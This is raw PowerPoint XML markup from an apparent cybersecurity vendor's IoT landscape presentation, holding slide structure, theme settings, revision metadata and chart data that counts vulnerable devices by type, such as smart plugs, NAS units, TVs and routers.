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88" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId42"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId43"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="2147374765" r:id="rId7"/>
    <p:sldId id="2147374756" r:id="rId8"/>
    <p:sldId id="2147374711" r:id="rId9"/>
    <p:sldId id="2147374754" r:id="rId10"/>
    <p:sldId id="286" r:id="rId11"/>
    <p:sldId id="2147374757" r:id="rId12"/>
    <p:sldId id="2147374762" r:id="rId13"/>
    <p:sldId id="2147374758" r:id="rId14"/>
    <p:sldId id="2147374763" r:id="rId15"/>
    <p:sldId id="2147374764" r:id="rId16"/>
    <p:sldId id="2147374767" r:id="rId17"/>
    <p:sldId id="2147374766" r:id="rId18"/>
    <p:sldId id="2147374769" r:id="rId19"/>
    <p:sldId id="2147374768" r:id="rId20"/>
    <p:sldId id="2147374770" r:id="rId21"/>
    <p:sldId id="2147374774" r:id="rId22"/>
    <p:sldId id="2147374772" r:id="rId23"/>
    <p:sldId id="2147374771" r:id="rId24"/>
    <p:sldId id="2147374773" r:id="rId25"/>
    <p:sldId id="283" r:id="rId26"/>
    <p:sldId id="280" r:id="rId27"/>
    <p:sldId id="2147374743" r:id="rId28"/>
    <p:sldId id="2147374732" r:id="rId29"/>
    <p:sldId id="2147374744" r:id="rId30"/>
    <p:sldId id="2147374745" r:id="rId31"/>
    <p:sldId id="2147374746" r:id="rId32"/>
    <p:sldId id="2147374747" r:id="rId33"/>
    <p:sldId id="2147374748" r:id="rId34"/>
    <p:sldId id="2147374749" r:id="rId35"/>
    <p:sldId id="2147374750" r:id="rId36"/>
    <p:sldId id="2147374751" r:id="rId37"/>
    <p:sldId id="2147374753" r:id="rId38"/>
    <p:sldId id="288" r:id="rId39"/>
    <p:sldId id="2147374742" r:id="rId40"/>
    <p:sldId id="214737475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seful tips" id="{DA1F7FF0-1819-4751-8E55-CD10E776F554}">
          <p14:sldIdLst>
            <p14:sldId id="2147374765"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Generic Cover" id="{F6389936-83C3-4ECB-81D7-148729A7745D}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Presentation" id="{E3C392F4-AFCF-4187-A456-10B0827D2317}">
          <p14:sldIdLst>
            <p14:sldId id="2147374756"/>
            <p14:sldId id="2147374711"/>
            <p14:sldId id="2147374754"/>
            <p14:sldId id="286"/>
            <p14:sldId id="2147374757"/>
            <p14:sldId id="2147374762"/>
            <p14:sldId id="2147374758"/>
            <p14:sldId id="2147374763"/>
            <p14:sldId id="2147374764"/>
            <p14:sldId id="2147374767"/>
            <p14:sldId id="2147374766"/>
            <p14:sldId id="2147374769"/>
            <p14:sldId id="2147374768"/>
            <p14:sldId id="2147374770"/>
            <p14:sldId id="2147374774"/>
            <p14:sldId id="2147374772"/>
            <p14:sldId id="2147374771"/>
            <p14:sldId id="2147374773"/>
            <p14:sldId id="283"/>
            <p14:sldId id="280"/>
            <p14:sldId id="2147374743"/>
            <p14:sldId id="2147374732"/>
            <p14:sldId id="2147374744"/>
            <p14:sldId id="2147374745"/>
            <p14:sldId id="2147374746"/>
            <p14:sldId id="2147374747"/>
            <p14:sldId id="2147374748"/>
            <p14:sldId id="2147374749"/>
            <p14:sldId id="2147374750"/>
            <p14:sldId id="2147374751"/>
            <p14:sldId id="2147374753"/>
            <p14:sldId id="288"/>
            <p14:sldId id="2147374742"/>
            <p14:sldId id="21473747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FF"/>
    <a:srgbClr val="F5F5F5"/>
    <a:srgbClr val="597080"/>
    <a:srgbClr val="00A71A"/>
    <a:srgbClr val="FF7500"/>
    <a:srgbClr val="002266"/>
    <a:srgbClr val="FF0000"/>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F6B94A-1FF0-8149-B9A2-92C6066E122E}" v="2" dt="2025-11-12T09:08:07.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9"/>
    <p:restoredTop sz="94573"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="113" d="100"/>
          <a:sy n="113" d="100"/>
        </p:scale>
        <p:origin x="960"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gdan BOTEZATU" userId="20f6c8a8-09ff-4aa6-9f9b-f618e6f0b7b4" providerId="ADAL" clId="{B17A9AA1-3584-55DC-A985-20BC9589FB51}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Bogdan BOTEZATU" userId="20f6c8a8-09ff-4aa6-9f9b-f618e6f0b7b4" providerId="ADAL" clId="{B17A9AA1-3584-55DC-A985-20BC9589FB51}" dt="2025-11-12T09:08:07.885" v="2"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modAnim">
        <pc:chgData name="Bogdan BOTEZATU" userId="20f6c8a8-09ff-4aa6-9f9b-f618e6f0b7b4" providerId="ADAL" clId="{B17A9AA1-3584-55DC-A985-20BC9589FB51}" dt="2025-11-12T09:08:07.885" v="2"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3041977723" sldId="2147374754"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="Bogdan BOTEZATU" userId="20f6c8a8-09ff-4aa6-9f9b-f618e6f0b7b4" providerId="ADAL" clId="{B17A9AA1-3584-55DC-A985-20BC9589FB51}" dt="2025-11-12T09:07:28.895" v="0" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3652885056" sldId="21473747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itdefender-my.sharepoint.com/personal/bbotezatu_bitdefender_biz/Documents/whitepapers/IoT%20Landscape%20Report%2025/Datasheet%20-%20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'Vulnerable Devices Split - 2025'!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>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DFD-B944-8DB5-37549B053A8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DFD-B944-8DB5-37549B053A8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DFD-B944-8DB5-37549B053A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DFD-B944-8DB5-37549B053A8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DFD-B944-8DB5-37549B053A8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DFD-B944-8DB5-37549B053A8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DFD-B944-8DB5-37549B053A8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DFD-B944-8DB5-37549B053A8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DFD-B944-8DB5-37549B053A8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DFD-B944-8DB5-37549B053A89}"/>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'Vulnerable Devices Split - 2025'!$A$2:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>Smart Plug</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>NAS</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>TV</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>IP Camera</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Router</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Home Automation</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Speakers</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Home Monitoring</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Extender</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Phone</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Vulnerable Devices Split - 2025'!$B$2:$B$11</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>1413332</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>582123</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>482632</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>150726</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>144182</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>108495</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>103051</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>89362</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>79077</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>71197</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000014-6DFD-B944-8DB5-37549B053A8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5568FF-2B2C-920D-39D5-B97DE6E8E6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01C790-5925-48DC-CAD9-2499D01E12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ABFE02-E5A4-47B6-9952-239E72DB4643}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/12/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1E9AED0-54F3-BC07-C5BC-B77632C554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97E89B-9C1E-FE29-CE28-01110672DA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F8CA22-BCFE-4F7A-B635-C8AA1CC3309A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106756998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75D90-E721-4D9F-844B-09A1AAD0276C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/12/25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BDCA0-71DF-455D-ACD5-2ED1DB05D5CF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332574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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F633BBE-B9E8-A245-BB96-46604F526B54}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2755381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EAF22-F82E-6029-2988-EE376BB57F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66656-EE60-4D79-83BD-9ABB2882F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5D14C0-66F5-E678-FE89-F72BE379F68E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-17145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a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17627C4C-34AB-9DA1-1147-8F9A3E2B16E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F633BBE-B9E8-A245-BB96-46604F526B54}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162651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4BDCA0-71DF-455D-ACD5-2ED1DB05D5CF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1048071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8D7F7-FC22-8D5F-F1EB-F5D5C3AF9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A2ED4-058E-CEE9-7BDE-599E6192E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BD6CA-3768-17C2-7E39-7214C123DC0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-17145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a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFE9D9F-B39A-7F4A-A5D9-D9D74DB24A9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F633BBE-B9E8-A245-BB96-46604F526B54}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241144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8EF97-E6E5-FA5A-A104-EA7FCDA75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C8FAB-47DF-F88A-5B26-36E07B2FF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D482A-C78E-0506-CA29-A49341902396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-17145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a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2435ABC9-4A39-4DAD-D46A-2D6B2E09A5D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F633BBE-B9E8-A245-BB96-46604F526B54}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143506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019A-66FC-48DD-436C-052190F7E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4E377-D1D2-46EB-C1D0-11FCF8C31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C173F-D459-8887-B5F8-AF0191471BD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-17145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a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94B2587D-E372-66FF-C419-7B1D6545B09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F633BBE-B9E8-A245-BB96-46604F526B54}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192522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42E51-8662-0BEC-D12D-996B57FB0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11366-D4CE-BDB0-10F9-529EDA0F2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F1DB1-6C87-691A-794F-B3485E20FF67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-17145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a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E759CB3D-942F-A33B-B8F1-0D30983D18F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F633BBE-B9E8-A245-BB96-46604F526B54}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3306581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35660-C18A-C481-87C5-D04BF0BD4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A606D-077D-17AB-EFAB-26B12CC2F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2C5E6-6DD3-28D8-DF8F-26633CF61359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-17145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a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39F700CC-B103-9CE7-FE39-82B7D4B04D8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F633BBE-B9E8-A245-BB96-46604F526B54}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2274010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E3CC-01DD-FC73-6394-210AC3577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EA6BD-2810-89B4-DC4E-3A5E89079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1C765-DD7A-1CEE-18A9-2870E0F9132A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-17145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a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF58D17-772C-A0B5-EDD9-4DDE02789430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F633BBE-B9E8-A245-BB96-46604F526B54}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271559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EE728-5CAC-C643-FD2C-AB89A613D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35A39-2098-F23E-417B-FB6CF72367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39306-DA3D-D4FD-E512-F0ABAD00B6F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-17145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a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67976FF9-8C29-BB62-F734-89E8D27B69BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F633BBE-B9E8-A245-BB96-46604F526B54}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1983599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rporate Presentation Generic Cover">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="006EFF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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18385019-631B-61B6-4B18-B0F613B5E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844" b="12419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6383903" y="851724"/>
            <a:ext cx="5808097" cy="6006276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphic 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA22621A-FE50-9E85-2179-027FF6F931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03467" y="2853383"/>
            <a:ext cx="5980436" cy="857489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF529A5-EF59-679B-7E3E-2F6A88634196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403467" y="436225"/>
            <a:ext cx="2324660" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Global Leader In Cybersecurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4166516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age Diagram ">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BF417732-A58D-9A40-2435-DAA7A933018F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5388746" y="803999"/>
            <a:ext cx="6407339" cy="5162221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5146EBE-E734-DD3F-A0A5-4A839895EC3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
